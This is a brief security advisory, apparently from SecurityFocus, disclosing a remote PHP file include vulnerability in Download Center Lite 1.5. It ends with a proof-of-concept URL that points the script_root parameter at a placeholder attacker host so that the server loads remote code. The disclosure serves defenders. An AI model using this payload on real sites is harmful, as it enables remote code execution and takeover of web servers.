source: http://www.securityfocus.com/bid/12726/info
Download Center Lite is reportedly affected by an arbitrary remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user supplied input.
This vulnerability affects Download Center Lite version 1.5; earlier versions may also be affected.
http://www.example.com/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker]/